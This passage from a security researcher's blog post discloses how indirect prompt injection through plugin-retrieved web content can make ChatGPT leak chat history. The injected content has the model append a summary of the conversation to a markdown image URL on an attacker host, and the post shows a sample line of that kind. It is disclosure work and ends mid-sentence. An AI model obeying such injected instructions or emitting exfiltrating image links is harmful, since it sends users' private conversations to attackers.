This post shows how a malicious website can take control of a ChatGPT chat session and exfiltrate the history of the conversation.
With plugins, data exfiltration can happen by sending too much data into the plugin in the first place. More security controls and insights on what is being sent to the plugin are required to empower users.
However, this post is not about sending too much data to a plugin, but about a malicious actor who controls the data a plugin retrieves.
Untrusted Data and Markdown Injection
The individual controlling the data a plugin retrieves can exfiltrate chat history due to ChatGPT’s rendering of markdown images.
Basically, if the LLM returns a markdown image in the form of
![data exfiltration in progress](https://attacker/q=*exfil_data*)
ChatGPT will render it automatically and retrieve the URL. During an Indirect Prompt Injection the adversary controls what the LLM is doing (I call it AI Injection for a reason), and it can ask to summarize the past history of the chat and append it to the URL to exfiltrate the data.
I’m not the only one who points this out, Roman Samoilenko has observed and posted about this vulnerability in ChatGPT before. Roman found it March 14th. I ran across it separatley a few weeks after.
Proof of Concept Demonstration
This is possible with plugins, e.g. via the WebPilot Plugin or check out the YouTube Transcript Plugin Injection I posted about the other day.
The LLM’s response can contain markdown (or instruct the AI to build